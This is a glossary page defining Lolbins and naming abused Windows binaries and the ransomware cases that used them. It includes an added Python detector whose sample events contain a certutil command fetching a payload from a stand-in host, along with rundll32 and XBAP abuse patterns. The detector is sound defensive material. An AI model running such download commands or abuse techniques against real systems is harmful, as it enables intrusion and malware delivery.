A Living off the Land Binary, or Lolbin, is a legitimate system binary, such as a DLL or executable, that ships with the Windows operating system and that an attacker can leverage in attacks such as fileless malware. The Lolbin definition may also include legitimate, signed administration tools such as PsExec.
Lolbin Definition and Meaning
Thousands of DLLs come pre-installed with Windows as a shared pool of resources used for legitimate purposes; they are designed to keep individual program sizes down (DLLs account for several GBs of a Windows install) and to avoid re-inventing the wheel. With so many DLLs there is a risk of misuse through known and unknown vulnerabilities, and DLL Search Order Hijacking and DLL side-loading make it easier for an attacker to hijack further DLLs. Lolbins are used disproportionately often by Advanced Persistent Threats (APTs).
- Presentation Host: Executes XAML Browser Application (XBAP) files and can therefore be used to execute a malicious XBAP file.
- Rundll32.exe: Used by Windows to execute DLL files. Can be used for attacks including Pass-Thru Command Execution and Lateral Movement.
- Certutil: Used for certificate handling. Used in the Kaseya Ransomware Attack.
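A detection heuristic for the three binaries listed above, added here as an example that is not part of the original page: it scans process-creation events for a Lolbin loading a DLL or XBAP from a user-writable path, certutil fetching or decoding a file, or any of the three being spawned by an Office process. The events, paths and URL are constructed sample data, not real telemetry.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped like
# the fields of a Sysmon Event ID 1 record: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Public\update.dll,DllRegisterServer"},
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\Users\bob\AppData\Local\Temp\p.bin"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -verify C:\certs\server.cer"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\PresentationHost.exe",
     "cmd": r"PresentationHost.exe C:\Users\bob\Downloads\viewer.xbap"},
]

LOLBINS = {"rundll32.exe", "certutil.exe", "presentationhost.exe"}
# Locations a standard user can write to: a DLL or XBAP loaded from here by a
# trusted system binary is the pattern side-loading and search-order hijacks rely on.
USER_WRITABLE = re.compile(r"(?i)\\(Users|ProgramData|Temp|AppData)\\")
URL = re.compile(r"(?i)\b(https?|ftp)://")
OFFICE_PARENT = re.compile(r"(?i)\\(winword|excel|powerpnt|outlook)\.exe$")

def classify(event):
    """Return the list of findings for one event; an empty list means it looks benign."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return []
    cmd = event["cmd"]
    findings = []
    if OFFICE_PARENT.search(event["parent"]):
        findings.append(f"{image} spawned by an Office process: {event['parent']}")
    if image == "rundll32.exe":
        # Syntax is "rundll32.exe <dll>,<entrypoint>"; the DLL path is the text before the comma.
        args = cmd.split(None, 1)[1] if " " in cmd else ""
        dll = args.split(",", 1)[0].strip('"')
        if USER_WRITABLE.search(dll):
            findings.append(f"rundll32 loading a DLL from a user-writable path: {dll}")
    elif image == "certutil.exe":
        # Fetching a remote file or decoding a base64 blob is rarely part of normal certificate administration.
        if URL.search(cmd) or re.search(r"(?i)\s-(urlcache|decode)\b", cmd):
            findings.append(f"certutil used to fetch or decode a file: {cmd}")
    elif image == "presentationhost.exe":
        if re.search(r"(?i)\.xbap\b", cmd):
            findings.append(f"PresentationHost launching an XBAP: {cmd}")
    return findings

def scan(events):
    """Run classify over a batch and return (image, finding) pairs."""
    return [(e["image"], f) for e in events for f in classify(e)]

if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {finding}")
```

Running it reports four findings: the rundll32 load from C:\Users\Public, two for the certutil download (Office parent plus URL fetch), and the XBAP launch; the shell32 and -verify events pass as benign.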
Examples of lolbin attacks
- Kaseya Ransomware Attack (REvil): The legitimate Certutil.exe binary was used to launch the ransomware.
- WastedLocker Ransomware: The legitimate Rundll32.exe binary was used in this attack.
- Live off the Land Binary
- Living off the Land Binary
For a community-maintained list of examples, see the Lolbas GitHub project.
Agreed upon as an official term alongside LOLScripts in 2018.